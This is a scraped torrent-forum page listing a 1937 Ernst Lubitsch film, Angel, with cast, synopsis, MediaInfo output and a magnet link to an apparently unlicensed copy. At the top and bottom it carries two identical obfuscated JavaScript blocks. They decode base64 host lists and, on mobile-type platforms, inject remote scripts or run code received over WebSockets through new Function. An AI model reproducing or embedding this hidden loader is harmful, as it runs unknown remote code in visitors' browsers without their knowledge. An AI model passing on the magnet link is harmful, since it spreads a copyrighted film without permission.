天使[中文字幕].Angel.1937.1080p.BluRay.DTS.x265-10bit 10.37GB

版主小s 1月前 368

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 天使

◎片 名 Angel

◎年 代 1937

◎产 地 美国

◎类 别 剧情 / 喜剧 / 爱情

◎语 言 英语 / 法语

◎上映日期 1937-10-29

◎IMDb链接 https://www.imdb.com/title/tt0028575/

◎豆瓣评分 7.6/10 (626人评价)

◎豆瓣链接 https://movie.douban.com/subject/1297042/

◎片 长 91 分钟

◎导 演 恩斯特·刘别谦 Ernst Lubitsch (id:1007140)

◎编 剧 弗雷德里克·朗斯代尔 Frederick Lonsdale (id:1006318)

盖伊·博尔顿 Guy Bolton (id:1038425)

梅尔希奥·伦杰尔 Melchior Lengyel (id:1017023)

Russell G. Medcraft Russell G. Medcraft (id:1008795)

山姆森·雷佛森 Samson Raphaelson (id:1003545)

◎演 员 玛琳·黛德丽 Marlene Dietrich (id:1013957)

赫伯特·马歇尔 Herbert Marshall (id:1055639)

茂文·道格拉斯 Melvyn Douglas (id:1002803)

奥拉夫·许滕 Olaf Hytten (id:1106567)

Suzanne Kaaren Suzanne Kaaren (id:1113110)

Ivan Lebedeff Ivan Lebedeff (id:1108863)

Arthur Hurni Arthur Hurni (id:1112110)

Eric Wilton Eric Wilton (id:1165402)

卡尔·M·莱维尼斯 Carl M. Leviness (id:1125401)

Dennie Moore Dennie Moore (id:1129139)

米哈伊尔·维萨罗夫 Michael Visaroff (id:1151794)

赫伯特芒丁 Herbert Mundin (id:1131967)

莱昂内尔·佩普 Lionel Pape (id:1137417)

Joseph Romantini Joseph Romantini (id:1145555)

山姆·哈里斯 Sam Harris (id:1100419)

Gerald Hamer Gerald Hamer (id:1098491)

爱德华·艾沃瑞特·霍顿 Edward Everett Horton (id:1032256)

李奥纳多·凯瑞 Leonard Carey (id:1033123)

欧内斯特·科萨特 Ernest Cossart (id:1069342)

Phyllis Coghlan Phyllis Coghlan (id:1071487)

Louise Carter Louise Carter (id:1073755)

基诺科拉多 Gino Corrado (id:1074733)

劳拉·霍普·克鲁斯 Laura Hope Crews (id:1077412)

Duci De Kerekjarto Duci De Kerekjarto (id:1080270)

詹姆斯·芬利森 James Finlayson (id:1083777)

George Davis George Davis (id:1086672)

赫伯特·埃文斯 Herbert Evans (id:1088153)

Bobby Hale Bobby Hale (id:1094316)

恩斯特·刘别谦 Ernst Lubitsch (id:1007140)

弗里德里希·霍兰德 Friedrich Hollaender (id:1054581)

维纳·R·海曼 Werner R. Heymann (id:1008313)

查尔斯·朗 Charles Lang (id:1104462)

William Shea William Shea (id:1004067)

罗伯特·阿舍尔 Robert Usher (id:1034650)

汉斯·德雷尔 Hans Dreier (id:1022608)

特拉维斯·班顿 Travis Banton (id:1025686)

Joe Lefert Joe Lefert (id:1106689)

法乔特·埃多特 Farciot Edouart (id:1088231)

Lloyd Knechtel Lloyd Knechtel (id:1013607)

哈里·佩里 Harry Perry (id:1129723)

◎标 签 美国 / 刘别谦 / 爱情 / 1930s / 1937 / MarleneDietrich / ErnstLubitsch / Ernst_Lubitsch

◎简 介

安吉(玛琳·黛德丽 Marlene Dietrich 饰)和丈夫巴克(赫伯特·马歇尔 Herbert Marshall 饰) 是结婚不久的夫妻,巴克是一个工作狂,将自己的大部分精力都放在了事业上,这让备受冷落的安吉非常的不满,她决定前往巴黎去散心。

在巴黎,安吉邂逅了名为安东尼(茂文·道格拉斯 Melvyn Douglas 饰)的男人,一见钟情的两人进行了一场甜蜜的约会,然而之后安吉却匆匆告别,留下安东尼一人倍感失落。安吉回到了巴克的身边,一天,巴克带了一个男人回家,这个男人是他在一个派对上遇见了老战友,让安吉没有想到的是,这个男人不是别人,竟然就是安东尼。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 320780331409942002886000145780591694227 (0xF1540B69CF6F0CB63F36F9F517BA1193)

  4. Complete name : [email protected]

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 10.4 GiB

  8. Duration : 1 h 30 min

  9. Overall bit rate : 16.3 Mb/s

  10. Movie name : Angel 1937 1080p BluRay DTS [email protected]

  11. Encoded date : UTC 2021-10-21 07:15:45

  12. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 30 min

  21. Bit rate : 14.8 Mb/s

  22. Width : 1 480 pixels

  23. Height : 1 080 pixels

  24. Display aspect ratio : 1.370

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.386

  31. Stream size : 9.38 GiB (90%)

  32. Title : @HDSky

  33. Writing library : x265 - H.265/HEVC codec

  34. Default : Yes

  35. Forced : No


  36. Audio

  37. ID : 2

  38. Format : DTS

  39. Format/Info : Digital Theater Systems

  40. Codec ID : A_DTS

  41. Duration : 1 h 30 min

  42. Bit rate mode : Constant

  43. Bit rate : 1 509 kb/s

  44. Channel(s) : 2 channels

  45. Channel layout : L R

  46. Sampling rate : 48.0 kHz

  47. Frame rate : 93.750 FPS (512 SPF)

  48. Bit depth : 24 bits

  49. Compression mode : Lossy

  50. Stream size : 981 MiB (9%)

  51. Title : English

  52. Language : English

  53. Default : Yes

  54. Forced : No


  55. Text #1

  56. ID : 3

  57. Format : PGS

  58. Muxing mode : zlib

  59. Codec ID : S_HDMV/PGS

  60. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  61. Duration : 1 h 28 min

  62. Bit rate : 41.7 kb/s

  63. Count of elements : 1514

  64. Stream size : 26.2 MiB (0%)

  65. Title : CHS

  66. Language : Chinese

  67. Default : Yes

  68. Forced : No


  69. Text #2

  70. ID : 4

  71. Format : PGS

  72. Muxing mode : zlib

  73. Codec ID : S_HDMV/PGS

  74. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  75. Duration : 1 h 28 min

  76. Bit rate : 42.7 kb/s

  77. Count of elements : 1514

  78. Stream size : 26.9 MiB (0%)

  79. Title : CHT

  80. Language : Chinese

  81. Default : No

  82. Forced : No


  83. Menu

  84. 00:00:00.000 : en:Chapter 01

  85. 00:06:21.423 : en:Chapter 02

  86. 00:14:05.053 : en:Chapter 03

  87. 00:22:12.373 : en:Chapter 04

  88. 00:31:45.445 : en:Chapter 05

  89. 00:37:53.980 : en:Chapter 06

  90. 00:50:39.078 : en:Chapter 07

  91. 01:00:28.416 : en:Chapter 08

  92. 01:12:10.701 : en:Chapter 09

  93. 01:19:03.948 : en:Chapter 10

  94. 01:27:28.743 : en:Chapter 11




复制代码


TAGS 剧情 喜剧 爱情

磁力链:
  • magnet:?xt=urn:btih:E374EDA572B4F66A9588E9E8D0C8EEEF16B7D31D

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};